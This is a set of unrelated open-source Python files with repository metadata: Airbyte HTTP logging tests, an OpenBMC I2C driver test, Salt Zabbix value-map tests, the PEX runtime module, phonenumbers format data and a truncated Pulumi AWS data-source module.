level=Level.INFO, message='request:{"url": "https://airbyte.io/", "http_method": "GET", "headers": {}, "body": null}'
),
),
),
(
"test_get_request_with_headers",
HttpMethod.GET,
"https://airbyte.io",
{"h1": "v1", "h2": "v2"},
{},
{},
{},
AirbyteMessage(
type=Type.LOG,
log=AirbyteLogMessage(
level=Level.INFO,
message='request:{"url": "https://airbyte.io/", "http_method": "GET", "headers": {"h1": "v1", "h2": "v2"}, "body": null}',
),
),
),
(
"test_get_request_with_request_params",
HttpMethod.GET,
"https://airbyte.io",
{},
{"p1": "v1", "p2": "v2"},
{},
{},
AirbyteMessage(
type=Type.LOG,
log=AirbyteLogMessage(
level=Level.INFO,
message='request:{"url": "https://airbyte.io/?p1=v1&p2=v2", "http_method": "GET", "headers": {}, "body": null}',
),
),
),
(
"test_get_request_with_request_body_json",
HttpMethod.GET,
"https://airbyte.io",
{"Content-Type": "application/json"},
{},
{"b1": "v1", "b2": "v2"},
{},
AirbyteMessage(
type=Type.LOG,
log=AirbyteLogMessage(
level=Level.INFO,
message='request:{"url": "https://airbyte.io/", "http_method": "GET", "headers": {"Content-Type": "application/json", "Content-Length": "24"}, "body": {"b1": "v1", "b2": "v2"}}',
),
),
),
(
"test_get_request_with_headers_params_and_body",
HttpMethod.GET,
"https://airbyte.io",
{"Content-Type": "application/json", "h1": "v1"},
{"p1": "v1", "p2": "v2"},
{"b1": "v1", "b2": "v2"},
{},
AirbyteMessage(
type=Type.LOG,
log=AirbyteLogMessage(
level=Level.INFO,
message='request:{"url": "https://airbyte.io/?p1=v1&p2=v2", "http_method": "GET", "headers": {"Content-Type": "application/json", "h1": "v1", "Content-Length": "24"}, "body": {"b1": "v1", "b2": "v2"}}',
),
),
),
(
"test_get_request_with_request_body_data",
HttpMethod.GET,
"https://airbyte.io",
{"Content-Type": "application/json"},
{},
{},
{"b1": "v1", "b2": "v2"},
AirbyteMessage(
type=Type.LOG,
log=AirbyteLogMessage(
level=Level.INFO,
message='request:{"url": "https://airbyte.io/", "http_method": "GET", "headers": {"Content-Type": "application/json", "Content-Length": "11"}, "body": {"b1": "v1", "b2": "v2"}}',
),
),
),
(
"test_basic_post_request",
HttpMethod.POST,
"https://airbyte.io",
{},
{},
{},
{},
AirbyteMessage(
type=Type.LOG,
log=AirbyteLogMessage(
level=Level.INFO,
message='request:{"url": "https://airbyte.io/", "http_method": "POST", "headers": {"Content-Length": "0"}, "body": null}',
),
),
),
],
)
def test_prepared_request_to_airbyte_message(test_name, http_method, url, headers, params, body_json, body_data, expected_airbyte_message):
request = requests.Request(method=http_method.name, url=url, headers=headers, params=params)
if body_json:
request.json = body_json
if body_data:
request.data = body_data
prepared_request = request.prepare()
actual_airbyte_message = _prepared_request_to_airbyte_message(prepared_request)
assert expected_airbyte_message == actual_airbyte_message
@pytest.mark.parametrize(
"test_name, response_body, response_headers, status_code, expected_airbyte_message",
[
(
"test_response_no_body_no_headers",
b"",
{},
200,
AirbyteMessage(
type=Type.LOG, log=AirbyteLogMessage(level=Level.INFO, message='response:{"body": "", "headers": {}, "status_code": 200}')
),
),
(
"test_response_no_body_with_headers",
b"",
{"h1": "v1", "h2": "v2"},
200,
AirbyteMessage(
type=Type.LOG,
log=AirbyteLogMessage(
level=Level.INFO, message='response:{"body": "", "headers": {"h1": "v1", "h2": "v2"}, "status_code": 200}'
),
),
),
(
"test_response_with_body_no_headers",
b'{"b1": "v1", "b2": "v2"}',
{},
200,
AirbyteMessage(
type=Type.LOG,
log=AirbyteLogMessage(
level=Level.INFO,
message='response:{"body": "{\\"b1\\": \\"v1\\", \\"b2\\": \\"v2\\"}", "headers": {}, "status_code": 200}',
),
),
),
(
"test_response_with_body_and_headers",
b'{"b1": "v1", "b2": "v2"}',
{"h1": "v1", "h2": "v2"},
200,
AirbyteMessage(
type=Type.LOG,
log=AirbyteLogMessage(
level=Level.INFO,
message='response:{"body": "{\\"b1\\": \\"v1\\", \\"b2\\": \\"v2\\"}", "headers": {"h1": "v1", "h2": "v2"}, "status_code": 200}',
),
),
),
],
)
def test_response_to_airbyte_message(test_name, response_body, response_headers, status_code, expected_airbyte_message):
response = requests.Response()
response.status_code = status_code
response.headers = response_headers
response._content = response_body
actual_airbyte_message = _response_to_airbyte_message(response)
assert expected_airbyte_message == actual_airbyte_message
def test_limit_stream_slices():
maximum_number_of_slices = 4
stream_slicer = MagicMock()
stream_slicer.stream_slices.return_value = _generate_slices(maximum_number_of_slices * 2)
retriever = SimpleRetrieverTestReadDecorator(
name="stream_name",
primary_key=primary_key,
requester=MagicMock(),
paginator=MagicMock(),
record_selector=MagicMock(),
stream_slicer=stream_slicer,
maximum_number_of_slices=maximum_number_of_slices,
parameters={},
config={},
)
truncated_slices = list(retriever.stream_slices(sync_mode=SyncMode.incremental, stream_state=None))
assert truncated_slices == _generate_slices(maximum_number_of_slices)
def _generate_slices(number_of_slices):
return [{"date": f"2022-01-0{day + 1}"} for day in range(number_of_slices)]
|
6de2084e7f96ff0b28dcfa5d8f8c7d24107b51d9
|
ac2f43c8e0d9649a7f063c59b3dffdfed9fd7ed7
|
/tests2/tests/cloudripper/test_i2c_driver_presence.py
|
4b789f4065e7c78d6392daaec4b9a0073e5b8ba3
|
[] |
no_license
|
facebook/openbmc
|
bef10604ced226288600f55248b7f1be9945aea4
|
32777c66a8410d767eae15baabf71c61a0bef13c
|
refs/heads/helium
| 2023-08-17T03:13:54.729494
| 2023-08-16T23:24:18
| 2023-08-16T23:24:18
| 31,917,712
| 684
| 331
| null | 2023-07-25T21:19:08
| 2015-03-09T19:18:35
|
C
|
UTF-8
|
Python
| false
| false
| 1,600
|
py
|
test_i2c_driver_presence.py
|
#!/usr/bin/env python3
#
# Copyright 2020-present Facebook. All Rights Reserved.
#
# This program file is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the
# Free Software Foundation; version 2 of the License.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
# for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program in a file named COPYING; if not, write to the
# Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor,
# Boston, MA 02110-1301 USA
#
import unittest
from common.base_i2c_driver_presence_test import BaseI2cDriverPresenceTest
from utils.test_utils import qemu_check
class CloudripperI2cDriverPresenceTest(BaseI2cDriverPresenceTest, unittest.TestCase):
def set_i2c_driver_list(self):
self.i2c_driver_list = [
"ir35215",
"xdpe12284",
"powr1220",
"xdpe12284",
"pxe1610",
"adm1275",
"lm75",
"tmp421",
"net_asic",
"pca953x",
"domfpga",
"psu_driver",
"smb_pwrcpld",
"smb_syscpld",
"scmcpld",
"fcbcpld",
]
@unittest.skipIf(qemu_check(), "test env is QEMU, skipped")
def test_i2c_driver_presence(self):
super().test_i2c_driver_presence()
|
2137a93a916c5db5887d1ecfcd9839bee8dbf7a0
|
d110546d747d7e3865ce5742d5fca09f404623c0
|
/tests/pytests/unit/states/zabbix/test_valuemap.py
|
bc589d7bc92b9cb1bf56f6d8006ee1e6cc2179fc
|
[
"Apache-2.0",
"MIT",
"BSD-2-Clause"
] |
permissive
|
saltstack/salt
|
354fc86a7be1f69514b3dd3b2edb9e6f66844c1d
|
1ef90cbdc7203f97775edb7666db86a41eb9fc15
|
refs/heads/master
| 2023-07-19T20:56:20.210556
| 2023-06-29T23:12:28
| 2023-07-19T11:47:47
| 1,390,248
| 11,026
| 6,296
|
Apache-2.0
| 2023-09-14T20:45:37
| 2011-02-20T20:16:56
|
Python
|
UTF-8
|
Python
| false
| false
| 7,841
|
py
|
test_valuemap.py
|
"""
:codeauthor: :email:`Jakub Sliva <jakub.sliva@ultimum.io>`
"""
import pytest
import salt.states.zabbix_valuemap as zabbix_valuemap
from tests.support.mock import MagicMock, patch
@pytest.fixture
def input_params():
return {
"mappings": [
{"newvalue": "OK", "value": "0h"},
{"newvalue": "Failure", "value": "1"},
],
"name": "Server HP Health",
}
@pytest.fixture
def existing_obj():
return [
{
"valuemapid": "21",
"name": "Server HP Health",
"mappings": [
{"newvalue": "OK", "value": "0h"},
{"newvalue": "Failure", "value": "1"},
],
}
]
@pytest.fixture
def existing_obj_diff():
return {
"valuemapid": "21",
"name": "Server HP Health",
"mappings": [
{"newvalue": "OK", "value": "0h"},
{"newvalue": "Failure", "value": "1"},
{"newvalue": "some", "value": "2"},
],
}
@pytest.fixture
def diff_params():
return {
"valuemapid": "21",
"mappings": [
{"newvalue": "OK", "value": "0h"},
{"newvalue": "Failure", "value": "1"},
],
}
@pytest.fixture
def configure_loader_modules():
return {zabbix_valuemap: {}}
def test_present_create(input_params):
"""
Test to ensure that named value map is created
"""
name = "Server HP Health"
ret = {"name": name, "result": False, "comment": "", "changes": {}}
def side_effect_run_query(*args):
"""
Differentiate between __salt__ exec module function calls with different parameters.
"""
if args[0] == "valuemap.get":
return False
elif args[0] == "valuemap.create":
return True
with patch.dict(zabbix_valuemap.__opts__, {"test": False}):
with patch.dict(
zabbix_valuemap.__salt__,
{
"zabbix.get_zabbix_id_mapper": MagicMock(
return_value={"valuemap": "valuemapid"}
),
"zabbix.substitute_params": MagicMock(
side_effect=[input_params, False]
),
"zabbix.run_query": MagicMock(side_effect=side_effect_run_query),
"zabbix.compare_params": MagicMock(return_value={}),
},
):
ret["result"] = True
ret["comment"] = 'Zabbix Value map "{}" created.'.format(name)
ret["changes"] = {
name: {
"old": 'Zabbix Value map "{}" did not exist.'.format(name),
"new": 'Zabbix Value map "{}" created according definition.'.format(
name
),
}
}
assert zabbix_valuemap.present(name, {}) == ret
def test_present_exists(input_params, existing_obj):
"""
Test to ensure that named value map is present and not changed
"""
name = "Server HP Health"
ret = {"name": name, "result": False, "comment": "", "changes": {}}
with patch.dict(zabbix_valuemap.__opts__, {"test": False}):
with patch.dict(
zabbix_valuemap.__salt__,
{
"zabbix.get_zabbix_id_mapper": MagicMock(
return_value={"valuemap": "valuemapid"}
),
"zabbix.substitute_params": MagicMock(
side_effect=[input_params, existing_obj]
),
"zabbix.run_query": MagicMock(return_value=["length of result is 1"]),
"zabbix.compare_params": MagicMock(return_value={}),
},
):
ret["result"] = True
ret[
"comment"
] = 'Zabbix Value map "{}" already exists and corresponds to a definition.'.format(
name
)
assert zabbix_valuemap.present(name, {}) == ret
def test_present_update(input_params, existing_obj_diff, diff_params):
"""
Test to ensure that named value map is present but must be updated
"""
name = "Server HP Health"
ret = {"name": name, "result": False, "comment": "", "changes": {}}
def side_effect_run_query(*args):
"""
Differentiate between __salt__ exec module function calls with different parameters.
"""
if args[0] == "valuemap.get":
return ["length of result is 1 = valuemap exists"]
elif args[0] == "valuemap.update":
return diff_params
with patch.dict(zabbix_valuemap.__opts__, {"test": False}):
with patch.dict(
zabbix_valuemap.__salt__,
{
"zabbix.get_zabbix_id_mapper": MagicMock(
return_value={"valuemap": "valuemapid"}
),
"zabbix.substitute_params": MagicMock(
side_effect=[input_params, existing_obj_diff]
),
"zabbix.run_query": MagicMock(side_effect=side_effect_run_query),
"zabbix.compare_params": MagicMock(return_value=diff_params),
},
):
ret["result"] = True
ret["comment"] = 'Zabbix Value map "{}" updated.'.format(name)
ret["changes"] = {
name: {
"old": (
'Zabbix Value map "{}" differed '
"in following parameters: {}".format(name, diff_params)
),
"new": 'Zabbix Value map "{}" fixed.'.format(name),
}
}
assert zabbix_valuemap.present(name, {}) == ret
def test_absent_test_mode():
"""
Test to ensure that named value map is absent in test mode
"""
name = "Server HP Health"
ret = {"name": name, "result": False, "comment": "", "changes": {}}
with patch.dict(zabbix_valuemap.__opts__, {"test": True}):
with patch.dict(
zabbix_valuemap.__salt__,
{"zabbix.get_object_id_by_params": MagicMock(return_value=11)},
):
ret["result"] = True
ret["comment"] = 'Zabbix Value map "{}" would be deleted.'.format(name)
ret["changes"] = {
name: {
"old": 'Zabbix Value map "{}" exists.'.format(name),
"new": 'Zabbix Value map "{}" would be deleted.'.format(name),
}
}
assert zabbix_valuemap.absent(name) == ret
def test_absent():
"""
Test to ensure that named value map is absent
"""
name = "Server HP Health"
ret = {"name": name, "result": False, "comment": "", "changes": {}}
with patch.dict(zabbix_valuemap.__opts__, {"test": False}):
with patch.dict(
zabbix_valuemap.__salt__,
{"zabbix.get_object_id_by_params": MagicMock(return_value=False)},
):
ret["result"] = True
ret["comment"] = 'Zabbix Value map "{}" does not exist.'.format(name)
assert zabbix_valuemap.absent(name) == ret
with patch.dict(
zabbix_valuemap.__salt__,
{"zabbix.get_object_id_by_params": MagicMock(return_value=11)},
):
with patch.dict(
zabbix_valuemap.__salt__,
{"zabbix.run_query": MagicMock(return_value=True)},
):
ret["result"] = True
ret["comment"] = 'Zabbix Value map "{}" deleted.'.format(name)
ret["changes"] = {
name: {
"old": 'Zabbix Value map "{}" existed.'.format(name),
"new": 'Zabbix Value map "{}" deleted.'.format(name),
}
}
assert zabbix_valuemap.absent(name) == ret
|
782c14fe5df3867c8f31dd1cc15070011440eb87
|
e76a79816ff5203be2c4061e263a09d31072c940
|
/third-party/py/pex/pex/pex.py
|
a928248558f25dbc552455e18c30deead440bd7e
|
[
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
facebook/buck
|
ef3a833334499b1b44c586e9bc5e2eec8d930e09
|
9c7c421e49f4d92d67321f18c6d1cd90974c77c4
|
refs/heads/main
| 2023-08-25T19:30:28.803205
| 2023-04-19T11:32:59
| 2023-04-19T11:32:59
| 9,504,214
| 8,481
| 1,338
|
Apache-2.0
| 2023-05-04T22:13:59
| 2013-04-17T18:12:18
|
Java
|
UTF-8
|
Python
| false
| false
| 17,019
|
py
|
pex.py
|
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import absolute_import, print_function
import os
import subprocess
import sys
from contextlib import contextmanager
from distutils import sysconfig
from site import USER_SITE
import pkg_resources
from pkg_resources import EntryPoint, WorkingSet, find_distributions
from .common import die
from .compatibility import exec_function
from .environment import PEXEnvironment
from .finders import get_entry_point_from_console_script, get_script_from_distributions
from .interpreter import PythonInterpreter
from .orderedset import OrderedSet
from .pex_info import PexInfo
from .tracer import TRACER
from .variables import ENV
class DevNull(object):
def __init__(self):
pass
def write(self, *args, **kw):
pass
def flush(self):
pass
class PEX(object): # noqa: T000
"""PEX, n. A self-contained python environment."""
class Error(Exception): pass
class NotFound(Error): pass
@classmethod
def clean_environment(cls):
try:
del os.environ['MACOSX_DEPLOYMENT_TARGET']
except KeyError:
pass
# Cannot change dictionary size during __iter__
filter_keys = [key for key in os.environ if key.startswith('PEX_')]
for key in filter_keys:
del os.environ[key]
def __init__(self, pex=sys.argv[0], interpreter=None, env=ENV):
self._pex = pex
self._interpreter = interpreter or PythonInterpreter.get()
self._pex_info = PexInfo.from_pex(self._pex)
self._pex_info_overrides = PexInfo.from_env(env=env)
self._vars = env
self._envs = []
self._working_set = None
def _activate(self):
if not self._working_set:
working_set = WorkingSet([])
# set up the local .pex environment
pex_info = self._pex_info.copy()
pex_info.update(self._pex_info_overrides)
self._envs.append(PEXEnvironment(self._pex, pex_info))
# set up other environments as specified in PEX_PATH
for pex_path in filter(None, self._vars.PEX_PATH.split(os.pathsep)):
pex_info = PexInfo.from_pex(pex_path)
pex_info.update(self._pex_info_overrides)
self._envs.append(PEXEnvironment(pex_path, pex_info))
# activate all of them
for env in self._envs:
for dist in env.activate():
working_set.add(dist)
self._working_set = working_set
return self._working_set
@classmethod
def _extras_paths(cls):
standard_lib = sysconfig.get_python_lib(standard_lib=True)
try:
makefile = sysconfig.parse_makefile(sysconfig.get_makefile_filename())
except (AttributeError, IOError):
# This is not available by default in PyPy's distutils.sysconfig or it simply is
# no longer available on the system (IOError ENOENT)
makefile = {}
extras_paths = filter(None, makefile.get('EXTRASPATH', '').split(':'))
for path in extras_paths:
yield os.path.join(standard_lib, path)
@classmethod
def _site_libs(cls):
try:
from site import getsitepackages
site_libs = set(getsitepackages())
except ImportError:
site_libs = set()
site_libs.update([sysconfig.get_python_lib(plat_specific=False),
sysconfig.get_python_lib(plat_specific=True)])
# On windows getsitepackages() returns the python stdlib too.
if sys.prefix in site_libs:
site_libs.remove(sys.prefix)
real_site_libs = set(os.path.realpath(path) for path in site_libs)
return site_libs | real_site_libs
@classmethod
def _tainted_path(cls, path, site_libs):
paths = frozenset([path, os.path.realpath(path)])
return any(path.startswith(site_lib) for site_lib in site_libs for path in paths)
@classmethod
def minimum_sys_modules(cls, site_libs, modules=None):
"""Given a set of site-packages paths, return a "clean" sys.modules.
When importing site, modules within sys.modules have their __path__'s populated with
additional paths as defined by *-nspkg.pth in site-packages, or alternately by distribution
metadata such as *.dist-info/namespace_packages.txt. This can possibly cause namespace
packages to leak into imports despite being scrubbed from sys.path.
NOTE: This method mutates modules' __path__ attributes in sys.module, so this is currently an
irreversible operation.
"""
modules = modules or sys.modules
new_modules = {}
for module_name, module in modules.items():
# builtins can stay
if not hasattr(module, '__path__'):
new_modules[module_name] = module
continue
# Unexpected objects, e.g. namespace packages, should just be dropped:
if not isinstance(module.__path__, list):
TRACER.log('Dropping %s' % (module_name,), V=3)
continue
# Pop off site-impacting __path__ elements in-place.
for k in reversed(range(len(module.__path__))):
if cls._tainted_path(module.__path__[k], site_libs):
TRACER.log('Scrubbing %s.__path__: %s' % (module_name, module.__path__[k]), V=3)
module.__path__.pop(k)
# It still contains path elements not in site packages, so it can stay in sys.modules
if module.__path__:
new_modules[module_name] = module
return new_modules
@classmethod
def minimum_sys_path(cls, site_libs):
site_distributions = OrderedSet()
user_site_distributions = OrderedSet()
def all_distribution_paths(path):
locations = set(dist.location for dist in find_distributions(path))
return set([path]) | locations | set(os.path.realpath(path) for path in locations)
for path_element in sys.path:
if cls._tainted_path(path_element, site_libs):
TRACER.log('Tainted path element: %s' % path_element)
site_distributions.update(all_distribution_paths(path_element))
else:
TRACER.log('Not a tainted path element: %s' % path_element, V=2)
user_site_distributions.update(all_distribution_paths(USER_SITE))
for path in site_distributions:
TRACER.log('Scrubbing from site-packages: %s' % path)
for path in user_site_distributions:
TRACER.log('Scrubbing from user site: %s' % path)
scrub_paths = site_distributions | user_site_distributions
scrubbed_sys_path = list(OrderedSet(sys.path) - scrub_paths)
scrub_from_importer_cache = filter(
lambda key: any(key.startswith(path) for path in scrub_paths),
sys.path_importer_cache.keys())
scrubbed_importer_cache = dict((key, value) for (key, value) in sys.path_importer_cache.items()
if key not in scrub_from_importer_cache)
for importer_cache_entry in scrub_from_importer_cache:
TRACER.log('Scrubbing from path_importer_cache: %s' % importer_cache_entry, V=2)
return scrubbed_sys_path, scrubbed_importer_cache
@classmethod
def minimum_sys(cls):
"""Return the minimum sys necessary to run this interpreter, a la python -S.
:returns: (sys.path, sys.path_importer_cache, sys.modules) tuple of a
bare python installation.
"""
site_libs = set(cls._site_libs())
for site_lib in site_libs:
TRACER.log('Found site-library: %s' % site_lib)
for extras_path in cls._extras_paths():
TRACER.log('Found site extra: %s' % extras_path)
site_libs.add(extras_path)
site_libs = set(os.path.normpath(path) for path in site_libs)
sys_path, sys_path_importer_cache = cls.minimum_sys_path(site_libs)
sys_modules = cls.minimum_sys_modules(site_libs)
return sys_path, sys_path_importer_cache, sys_modules
@classmethod
@contextmanager
def patch_pkg_resources(cls, working_set):
"""Patch pkg_resources given a new working set."""
def patch(working_set):
pkg_resources.working_set = working_set
pkg_resources.require = working_set.require
pkg_resources.iter_entry_points = working_set.iter_entry_points
pkg_resources.run_script = pkg_resources.run_main = working_set.run_script
pkg_resources.add_activation_listener = working_set.subscribe
old_working_set = pkg_resources.working_set
patch(working_set)
try:
yield
finally:
patch(old_working_set)
# Thar be dragons -- when this contextmanager exits, the interpreter is
# potentially in a wonky state since the patches here (minimum_sys_modules
# for example) actually mutate global state. This should not be
# considered a reversible operation despite being a contextmanager.
@classmethod
@contextmanager
def patch_sys(cls):
"""Patch sys with all site scrubbed."""
def patch_dict(old_value, new_value):
old_value.clear()
old_value.update(new_value)
def patch_all(path, path_importer_cache, modules):
sys.path[:] = path
patch_dict(sys.path_importer_cache, path_importer_cache)
patch_dict(sys.modules, modules)
old_sys_path, old_sys_path_importer_cache, old_sys_modules = (
sys.path[:], sys.path_importer_cache.copy(), sys.modules.copy())
new_sys_path, new_sys_path_importer_cache, new_sys_modules = cls.minimum_sys()
patch_all(new_sys_path, new_sys_path_importer_cache, new_sys_modules)
yield
def _wrap_coverage(self, runner, *args):
if not self._vars.PEX_COVERAGE and self._vars.PEX_COVERAGE_FILENAME is None:
runner(*args)
return
try:
import coverage
except ImportError:
die('Could not bootstrap coverage module, aborting.')
pex_coverage_filename = self._vars.PEX_COVERAGE_FILENAME
if pex_coverage_filename is not None:
cov = coverage.coverage(data_file=pex_coverage_filename)
else:
cov = coverage.coverage(data_suffix=True)
TRACER.log('Starting coverage.')
cov.start()
try:
runner(*args)
finally:
TRACER.log('Stopping coverage')
cov.stop()
# TODO(wickman) Post-process coverage to elide $PEX_ROOT and make
# the report more useful/less noisy. #89
if pex_coverage_filename:
cov.save()
else:
cov.report(show_missing=False, ignore_errors=True, file=sys.stdout)
def _wrap_profiling(self, runner, *args):
if not self._vars.PEX_PROFILE and self._vars.PEX_PROFILE_FILENAME is None:
runner(*args)
return
pex_profile_filename = self._vars.PEX_PROFILE_FILENAME
pex_profile_sort = self._vars.PEX_PROFILE_SORT
try:
import cProfile as profile
except ImportError:
import profile
profiler = profile.Profile()
try:
return profiler.runcall(runner, *args)
finally:
if pex_profile_filename is not None:
profiler.dump_stats(pex_profile_filename)
else:
profiler.print_stats(sort=pex_profile_sort)
def execute(self):
"""Execute the PEX.
This function makes assumptions that it is the last function called by
the interpreter.
"""
teardown_verbosity = self._vars.PEX_TEARDOWN_VERBOSE
try:
with self.patch_sys():
working_set = self._activate()
TRACER.log('PYTHONPATH contains:')
for element in sys.path:
TRACER.log(' %c %s' % (' ' if os.path.exists(element) else '*', element))
TRACER.log(' * - paths that do not exist or will be imported via zipimport')
with self.patch_pkg_resources(working_set):
self._wrap_coverage(self._wrap_profiling, self._execute)
except Exception:
# Allow the current sys.excepthook to handle this app exception before we tear things down in
# finally, then reraise so that the exit status is reflected correctly.
sys.excepthook(*sys.exc_info())
raise
except SystemExit as se:
# Print a SystemExit error message, avoiding a traceback in python3.
# This must happen here, as sys.stderr is about to be torn down
if not isinstance(se.code, int) and se.code is not None:
print(se.code, file=sys.stderr)
raise
finally:
# squash all exceptions on interpreter teardown -- the primary type here are
# atexit handlers failing to run because of things such as:
# http://stackoverflow.com/questions/2572172/referencing-other-modules-in-atexit
if not teardown_verbosity:
sys.stderr.flush()
sys.stderr = DevNull()
sys.excepthook = lambda *a, **kw: None
def _execute(self):
force_interpreter = self._vars.PEX_INTERPRETER
self.clean_environment()
if force_interpreter:
TRACER.log('PEX_INTERPRETER specified, dropping into interpreter')
return self.execute_interpreter()
if self._pex_info_overrides.script and self._pex_info_overrides.entry_point:
die('Cannot specify both script and entry_point for a PEX!')
if self._pex_info.script and self._pex_info.entry_point:
die('Cannot specify both script and entry_point for a PEX!')
if self._pex_info_overrides.script:
return self.execute_script(self._pex_info_overrides.script)
elif self._pex_info_overrides.entry_point:
return self.execute_entry(self._pex_info_overrides.entry_point)
elif self._pex_info.script:
return self.execute_script(self._pex_info.script)
elif self._pex_info.entry_point:
return self.execute_entry(self._pex_info.entry_point)
else:
TRACER.log('No entry point specified, dropping into interpreter')
return self.execute_interpreter()
def execute_interpreter(self):
if sys.argv[1:]:
try:
with open(sys.argv[1]) as fp:
name, content = sys.argv[1], fp.read()
except IOError as e:
die("Could not open %s in the environment [%s]: %s" % (sys.argv[1], sys.argv[0], e))
sys.argv = sys.argv[1:]
self.execute_content(name, content)
else:
import code
code.interact()
def execute_script(self, script_name):
dists = list(self._activate())
entry_point = get_entry_point_from_console_script(script_name, dists)
if entry_point:
return self.execute_entry(entry_point)
dist, script_path, script_content = get_script_from_distributions(script_name, dists)
if not dist:
raise self.NotFound('Could not find script %s in pex!' % script_name)
TRACER.log('Found script %s in %s' % (script_name, dist))
return self.execute_content(script_path, script_content, argv0=script_name)
@classmethod
def execute_content(cls, name, content, argv0=None):
argv0 = argv0 or name
try:
ast = compile(content, name, 'exec', flags=0, dont_inherit=1)
except SyntaxError:
die('Unable to parse %s. PEX script support only supports Python scripts.' % name)
old_name, old_file = globals().get('__name__'), globals().get('__file__')
try:
old_argv0, sys.argv[0] = sys.argv[0], argv0
globals()['__name__'] = '__main__'
globals()['__file__'] = name
exec_function(ast, globals())
finally:
if old_name:
globals()['__name__'] = old_name
else:
globals().pop('__name__')
if old_file:
globals()['__file__'] = old_file
else:
globals().pop('__file__')
sys.argv[0] = old_argv0
@classmethod
def execute_entry(cls, entry_point):
runner = cls.execute_pkg_resources if ':' in entry_point else cls.execute_module
runner(entry_point)
@staticmethod
def execute_module(module_name):
import runpy
runpy.run_module(module_name, run_name='__main__')
@staticmethod
def execute_pkg_resources(spec):
entry = EntryPoint.parse("run = {0}".format(spec))
# See https://pythonhosted.org/setuptools/history.html#id25 for rationale here.
if hasattr(entry, 'resolve'):
# setuptools >= 11.3
runner = entry.resolve()
else:
# setuptools < 11.3
runner = entry.load(require=False)
runner()
def cmdline(self, args=()):
"""The commandline to run this environment.
:keyword args: Additional arguments to be passed to the application being invoked by the
environment.
"""
cmds = [self._interpreter.binary]
cmds.append(self._pex)
cmds.extend(args)
return cmds
def run(self, args=(), with_chroot=False, blocking=True, setsid=False, **kw):
"""Run the PythonEnvironment in an interpreter in a subprocess.
:keyword args: Additional arguments to be passed to the application being invoked by the
environment.
:keyword with_chroot: Run with cwd set to the environment's working directory.
:keyword blocking: If true, return the return code of the subprocess.
If false, return the Popen object of the invoked subprocess.
:keyword setsid: If true, run the PEX in a separate operating system session.
Remaining keyword arguments are passed directly to subprocess.Popen.
"""
self.clean_environment()
cmdline = self.cmdline(args)
TRACER.log('PEX.run invoking %s' % ' '.join(cmdline))
process = subprocess.Popen(
cmdline,
cwd=self._pex if with_chroot else os.getcwd(),
preexec_fn=os.setsid if setsid else None,
**kw)
return process.wait() if blocking else process
|
d3c94ed180a7288ebdba249b25efe1922d5e16f7
|
54292bb222c6525217458e92ddacfc4e2635b83e
|
/python/phonenumbers/data/alt_format_62.py
|
7cda9598359526faf50dc6d50a4dc028c79533b4
|
[
"Apache-2.0"
] |
permissive
|
daviddrysdale/python-phonenumbers
|
0d69b48033d1464c0a6c358274062f1db2ee8c4a
|
2f06ef6db2ca83f3856fbb8019a0c665f5971b13
|
refs/heads/dev
| 2023-08-31T09:37:20.570690
| 2023-08-22T05:18:22
| 2023-08-22T05:18:22
| 1,643,611
| 2,944
| 406
|
Apache-2.0
| 2023-08-08T06:49:07
| 2011-04-21T03:06:38
|
Python
|
UTF-8
|
Python
| false
| false
| 806
|
py
|
alt_format_62.py
|
"""Auto-generated file, do not edit by hand. 62 metadata"""
from ..phonemetadata import NumberFormat
PHONE_ALT_FORMAT_62 = [NumberFormat(pattern='(\\d{2})(\\d{3,4})(\\d{4})', format='\\1 \\2 \\3', leading_digits_pattern=['2[124]|[36]1']), NumberFormat(pattern='(\\d{2})(\\d{3})(\\d{5})', format='\\1 \\2 \\3', leading_digits_pattern=['2[124]|[36]1']), NumberFormat(pattern='(\\d{2})(\\d{2})(\\d{3})(\\d{3})', format='\\1 \\2 \\3 \\4', leading_digits_pattern=['2[124]|[36]1']), NumberFormat(pattern='(\\d{3})(\\d{3})(\\d{4})', format='\\1 \\2 \\3', leading_digits_pattern=['8[1-35-9]']), NumberFormat(pattern='(\\d{3})(\\d{3})(\\d{5,6})', format='\\1 \\2 \\3', leading_digits_pattern=['8']), NumberFormat(pattern='(\\d{3})(\\d{3})(\\d{2})(\\d{3})', format='\\1 \\2 \\3 \\4', leading_digits_pattern=['8'])]
|
ade31c7a395c3210c0945a847f22009ad5abee79
|
1742b6719b988e5519373002305e31d28b8bd691
|
/sdk/python/pulumi_aws/oam/get_sinks.py
|
c769b4bc884dd073a0f9f474c817736cfd2f638b
|
[
"MPL-2.0",
"BSD-3-Clause",
"Apache-2.0"
] |
permissive
|
pulumi/pulumi-aws
|
4f7fdb4a816c5ea357cff2c2e3b613c006e49f1a
|
42b0a0abdf6c14da248da22f8c4530af06e67b98
|
refs/heads/master
| 2023-08-03T23:08:34.520280
| 2023-08-01T18:09:58
| 2023-08-01T18:09:58
| 97,484,940
| 384
| 171
|
Apache-2.0
| 2023-09-14T14:48:40
| 2017-07-17T14:20:33
|
Java
|
UTF-8
|
Python
| false
| false
| 2,158
|
py
|
get_sinks.py
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import copy
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = [
'GetSinksResult',
'AwaitableGetSinksResult',
'get_sinks',
]
@pulumi.output_type
class GetSinksResult:
"""
A collection of values returned by getSinks.
"""
def __init__(__self__, arns=None, id=None):
if arns and not isinstance(arns, list):
raise TypeError("Expected argument 'arns' to be a list")
pulumi.set(__self__, "arns", arns)
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
@property
@pulumi.getter
def arns(self) -> Sequence[str]:
"""
Set of ARN of the Sinks.
"""
return pulumi.get(self, "arns")
@property
@pulumi.getter
def id(self) -> str:
"""
The provider-assigned unique ID for this managed resource.
"""
return pulumi.get(self, "id")
class AwaitableGetSinksResult(GetSinksResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetSinksResult(
